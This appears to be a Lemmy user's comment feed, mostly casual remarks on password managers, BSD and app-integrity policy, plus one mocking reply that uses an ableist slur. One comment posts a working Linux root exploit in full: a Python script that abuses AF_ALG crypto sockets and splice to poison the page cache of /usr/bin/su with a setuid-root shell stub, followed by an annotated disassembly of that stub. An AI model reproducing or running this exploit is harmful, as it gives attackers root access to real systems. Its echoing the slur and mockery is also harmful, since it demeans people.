@pseud

pseud@lemmy.zip · 1 day ago

It’s amazing

So unfazing

pseud@lemmy.zip · 1 day ago

Are you one of those American adolescents that we keep reading about, which hit 18 and read at capybara level?

pseud@lemmy.zip · 1 day ago

'bout the NOBEL Prize named after Alfred NOBEL, a Swede — the one pronounced like noh-BEL (stress on the second syllable), the one which has nothing whatsoever to do with the English word “noble” in sound, spelling, or meaning?

But you know that, and you made a joke that Trump is a retard and would certainly think it’s The Noble Prize, right? Right??

pseud@lemmy.zip · 1 day ago

Drop a hint that you’re joking, don’t keep us in suspense…

pseud@lemmy.zip · 26 days ago

Yes.

Or Termux, if you insist.

Or just save the 3 passwords you actually need on the phone into Firefox password manager, or Vanadium, or whatever.

pseud@lemmy.zip · 26 days ago

The standard unix password manager, people.

There’s almost no password manager to it.

pseud@lemmy.zip · 1 month ago

I use DragonFly BSD btw

pseud@lemmy.zip · edit-2 1 month ago

Script:

#!/usr/bin/env python3

import os, socket

f = os.open("/usr/bin/su", 0)

e = b'\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00\x01\x00\x00\x00x\x00@\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x001\xc01\xff\xb0i\x0f\x05H\x8d=\x0f\x00\x00\x001\xf6j;X\x99\x0f\x051\xffj<X\x0f\x05/bin/sh\x00\x00\x00'

for i in range(0, len(e), 4):
    s = socket.socket(38, 5, 0)
    s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    s.setsockopt(279, 1, bytes.fromhex('0800010000000010' + '0' * 64))
    s.setsockopt(279, 5, None, 4)
    u, _ = s.accept()
    u.sendmsg([b"AAAA" + e[i:i + 4]],
              [(279, 3, b'\x00\x00\x00\x00'),
               (279, 2, b'\x10' + b'\x00' * 19),
               (279, 4, b'\x08\x00\x00\x00'), ],
              32768)
    r, w = os.pipe()
    os.splice(f, w, i + 4, offset_src=0)
    os.splice(r, u.fileno(), i + 4)
    try:
        u.recv(8 + i)
    except: pass

os.system("su")

Blob:

0x00400078      eax = 0
0x0040007a      edi = 0
0x0040007c      al = 0x69                 ; 'i' ; 105
0x0040007e      syscall                   ; sys_setuid(0)
0x00400080      rdi = rip + 0xf           ; data.00400096
                                          ; 0x400096 ; "/bin/sh"
0x00400087      esi = 0
0x00400089      push 0x3b                 ; ';' ; 59
0x0040008b      pop rax
0x0040008c      cdq
0x0040008d      syscall                   ; sys_execve("/bin/sh", NULL, NULL)
0x0040008f      edi = 0
0x00400091      push 0x3c                 ; '<' ; 60
0x00400093      pop rax
0x00400094      syscall                   ; sys_exit(0)

The blob is obviously a stub-su that /usr/bin/su page cache is poisoned with.

pseud@lemmy.zip · 3 months ago

Namely,

Having a European version of the Play Integrity which permits people to use insecure products from specific European companies participating in it while disallowing using arbitrary hardware or software is the opposite of a solution. It’s more of the same anti-competitive garbage.

Hate to say it but he’s probably right.